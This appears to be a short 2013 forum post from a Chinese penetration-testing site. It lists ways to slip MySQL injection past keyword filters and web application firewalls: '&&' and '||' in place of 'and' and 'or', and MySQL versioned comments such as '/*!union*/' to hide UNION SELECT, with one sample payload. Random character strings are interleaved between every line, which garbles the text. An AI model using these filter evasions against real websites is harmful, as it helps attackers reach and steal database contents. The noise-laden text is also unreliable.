中国网络渗透测试联盟
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
[打印本页]
作者:
admin
时间:
2013-2-23 12:41
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替
% x) ]0 L B9 [8 k1 D
% m4 p2 M' K+ o$ b* @ Y) y g3 m
2. or 用||代替
; s' ]+ h5 w* W% A& M* c& v. I3 L
* v" b/ d4 p/ I# p5 C
3.union select from 变成 /*!union*/这种。
9 O3 |, d6 _4 ]! @, \) i' y
7 B, S8 \" _3 \
一个例子:
) H7 t: n: D1 t- r0 V
0 |/ e% X* k- ~) u8 l* n& `) h
/ select 1 /*!union*/ select 2 from adad where 1&&1
$ R8 T: v; C$ Q/ |% O( Q
& Z6 g$ A& O& g2 {- l) S$ w# Q8 F
摘自 it_security
9 Z: c' \! Q3 `4 P* }! A7 R2 ~
& A, A( m7 S6 h( t/ E1 C8 r' \
绕过waf的一个思路
) T0 \7 X! T% Z
7 n( J' R% {( h3 q9 m ~& V( Y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2